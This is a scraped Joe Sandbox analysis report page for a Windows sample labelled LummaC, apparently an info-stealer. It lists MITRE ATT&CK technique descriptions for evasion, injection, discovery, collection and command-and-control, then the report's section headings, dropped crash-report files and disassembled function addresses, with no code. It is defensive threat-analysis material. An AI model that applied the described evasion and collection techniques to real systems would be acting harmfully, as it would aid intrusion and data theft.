Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to take screen captures of the desktop to gather information over the course of an operation. Screen capturing functionality may be included as a feature of a remote access tool used in post-compromise operations. Taking a screenshot is also typically possible through native utilities or API calls, such as `CopyFromScreen` , `xwd` , or `screencapture` .
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report L5Kgf2Tvkc.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: LummaC

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_L5Kgf2Tvkc.exe_194eabfc38a1df46cf83de5de75aa03ad1fe3566_c09415c6_00ce0f5f-e7b6-4990-b793-4897f05e98ba\Report.wer

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_L5Kgf2Tvkc.exe_194eabfc38a1df46cf83de5de75aa03ad1fe3566_c09415c6_299e7ad0-7baf-46f0-bc02-045ed09081d0\Report.wer

C:\ProgramData\Microsoft\Windows\WER\Temp\WER7C26.tmp.dmp

C:\ProgramData\Microsoft\Windows\WER\Temp\WER7D8E.tmp.WERInternalMetadata.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WER7DBE.tmp.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WER81A4.tmp.dmp

C:\ProgramData\Microsoft\Windows\WER\Temp\WER8232.tmp.WERInternalMetadata.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WER8252.tmp.xml

C:\Windows\appcompat\Programs\Amcache.hve

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Windows Analysis Report
L5Kgf2Tvkc.exe

Function 00437BC0 Relevance: 35.6, APIs: 11, Strings: 9, Instructions: 639
memorycomCOMMON

Function 0040AD40 Relevance: 12.9, Strings: 10, Instructions: 410
COMMON

Function 004085D0 Relevance: 7.7, APIs: 5, Instructions: 170
threadCOMMON

Function 0040A8C0 Relevance: 6.6, Strings: 5, Instructions: 384
COMMON

Function 0040C63C Relevance: 4.4, Strings: 3, Instructions: 602
COMMON

Function 004707A6 Relevance: 3.0, APIs: 2, Instructions: 41
processCOMMON

Function 0062003C Relevance: 12.8, APIs: 5, Strings: 2, Instructions: 515
memoryCOMMON

Function 0043C5AF Relevance: 3.0, APIs: 2, Instructions: 16
COMMON

Function 00620E0F Relevance: 3.0, APIs: 2, Instructions: 15
COMMON

Function 0043C2D0 Relevance: 1.5, APIs: 1, Instructions: 30
memoryCOMMON